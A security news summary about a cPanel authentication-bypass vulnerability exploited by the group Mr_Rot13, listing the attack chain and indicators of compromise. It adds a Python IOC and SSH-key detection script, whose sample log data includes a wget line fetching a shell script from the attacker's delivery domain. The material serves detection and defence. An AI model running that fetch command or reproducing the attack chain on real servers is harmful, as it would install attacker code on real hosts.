cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor
Source: The Hacker News
A threat actor known as Mr_Rot13 has been actively exploiting the recently disclosed critical cPanel vulnerability CVE‑2026‑41940 to deploy a backdoor dubbed Filemanager on compromised systems.

Vulnerability Overview
- CVE‑2026‑41940 affects cPanel and WebHost Manager (WHM).
- The flaw allows an authentication bypass, enabling remote attackers to gain elevated control of the control panel.
- Details are available in the original report on The Hacker News.
Threat Actor Attribution
Research from QiAnXin XLab links the exploitation to the group Mr_Rot13, a hacker collective that has been active for about six years and that weaponized this flaw shortly after its public disclosure.
“Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cyber‑crime activities targeting this vulnerability,” the XLab team noted.
The IPs are primarily sourced from Germany, the United States, Brazil, the Netherlands, and other regions.
Exploitation Mechanics
- Initial delivery – A shell script is fetched via wget or curl from the domain wpsock.com.
- Downloader – The script retrieves a Go‑based infector hosted at cp.dene.[de[.]com.
- Persistence – The infector installs an SSH public key on the compromised cPanel server for long‑term access.
- Web shell deployment – A PHP web shell is dropped, providing file upload/download and remote command execution capabilities.
- Credential harvesting – The web shell injects JavaScript that serves a fake login page. Captured credentials are exfiltrated to a ROT13‑encoded domain wrned.com (see the ROT13 Wikipedia page).
- Backdoor installation – The final payload is a cross‑platform backdoor (Windows, macOS, Linux) that supports full file management and shell functionality.

Indicators of Compromise (IOCs)
- Malicious domains
  - wpsock.com – delivery of the initial shell script.
  - cp.dene.[de[.]com – host of the Go infector.
  - wrned.com – ROT13‑encoded C2 for credential exfiltration.
- Files
  - helper.php – PHP backdoor observed on VirusTotal (uploaded April 2022).
  - Various PHP web shells used for file management and command execution.
- C2 channel – A Telegram group (3 members) managed by user 0xWR where harvested data (bash history, SSH keys, device info, database passwords, cPanel virtual aliases) is posted.
- IP activity – Over 2,000 source IPs across multiple continents, with notable concentrations in Germany, the US, Brazil, and the Netherlands.
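The delivery step (a wget/curl fetch from wpsock.com), the SSH-key persistence step and the domain IOCs above all lend themselves to a simple host sweep. The script below is an added example, not code from The Hacker News or XLab: it matches the article's two plain domain IOCs against log lines (the Go-infector host is left out because its defanged spelling above is not recoverable) and lists entries in an authorized_keys file whose fingerprint is not on an allowlist. The log lines, key blobs, allowlist and file paths are constructed for the demo; the fingerprint format is OpenSSH's SHA256 style.

```python
import base64
import hashlib
import re
from typing import Iterable

# Domain IOCs from the article; defanged spellings are normalised before use.
IOC_DOMAINS = ["wpsock.com", "wrned.com"]


def refang(domain: str) -> str:
    """Normalise a defanged indicator such as 'example[.]com' for matching."""
    return domain.replace("[.]", ".").lower()


# Match an IOC domain (with any subdomains) only as a whole hostname, so that
# look-alikes such as 'wpsock.community' or 'notwpsock.com' do not fire.
_IOC_RE = re.compile(
    r"(?<![a-z0-9.-])(?:[a-z0-9-]+\.)*("
    + "|".join(re.escape(refang(d)) for d in IOC_DOMAINS)
    + r")(?![a-z0-9.-])",
    re.IGNORECASE,
)
# The article says the first stage is fetched with wget or curl.
_FETCH_RE = re.compile(r"\b(?:wget|curl)\b", re.IGNORECASE)


def scan_lines(lines: Iterable[str]) -> list[dict]:
    """One hit per line that references an IOC domain: 1-based line number,
    matched domain, and whether a wget/curl command is on the same line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _IOC_RE.search(line)
        if match:
            hits.append({"line": number, "domain": match.group(1).lower(),
                         "fetch": bool(_FETCH_RE.search(line)), "text": line.strip()})
    return hits


def fingerprint(blob: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    digest = hashlib.sha256(base64.b64decode(blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def unknown_authorized_keys(authorized_keys: str, allowed: set[str]) -> list[dict]:
    """Keys in an authorized_keys file whose fingerprint is not allow-listed.
    Handles an optional leading options field; unparseable lines are flagged too."""
    findings = []
    for raw in authorized_keys.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            findings.append({"type": "?", "comment": line, "fingerprint": None})
            continue
        fp = fingerprint(parts[idx + 1])
        if fp not in allowed:
            findings.append({"type": parts[idx],
                             "comment": " ".join(parts[idx + 2:]) or "<no comment>",
                             "fingerprint": fp})
    return findings


def _fake_blob(label: str) -> str:
    """Constructed stand-in for key material (NOT a real key): base64 of a label."""
    return base64.b64encode(f"constructed-key-{label}".encode()).decode()


# Constructed sample input: a bash-history fragment and a DNS log line.
SAMPLE_LINES = [
    "cd /home/example/public_html",
    "wget -q http://wpsock.com/stage1.sh",
    "curl -s https://example.org/docs/wpsock.community",
    "client 203.0.113.7 query: wrned.com IN A",
]
# Constructed authorized_keys: two keys the admin knows about, one they do not.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed file for the demo",
    f"ssh-ed25519 {_fake_blob('admin')} admin@example",
    f'no-pty,command="/bin/true" ssh-rsa {_fake_blob("backup")} backup@example',
    f"ssh-ed25519 {_fake_blob('intruder')} root@localhost",
])
KNOWN_FINGERPRINTS = {fingerprint(_fake_blob("admin")), fingerprint(_fake_blob("backup"))}

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES):
        flag = " [download command]" if hit["fetch"] else ""
        print(f"line {hit['line']}: {hit['domain']}{flag}: {hit['text']}")
    for key in unknown_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_FINGERPRINTS):
        print(f"unknown key: {key['type']} {key['comment']} {key['fingerprint']}")
```

In real use, feed `scan_lines` the relevant shell histories, web-server access logs and DNS resolver logs, and build the allowlist from fingerprints recorded before the disclosure date; a key that is absent from that baseline on a cPanel host is exactly the persistence artefact the article describes and should be treated as a compromise indicator rather than silently removed.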
Historical Context
- The C2 domain embedded in the malicious JavaScript was first registered in October 2020.
- The same domain appeared in a PHP backdoor (helper.php) uploaded to VirusTotal in April 2022.
- XLab reports that detection rates for Mr_Rot13‑related samples have remained extremely low across security products over the past six years.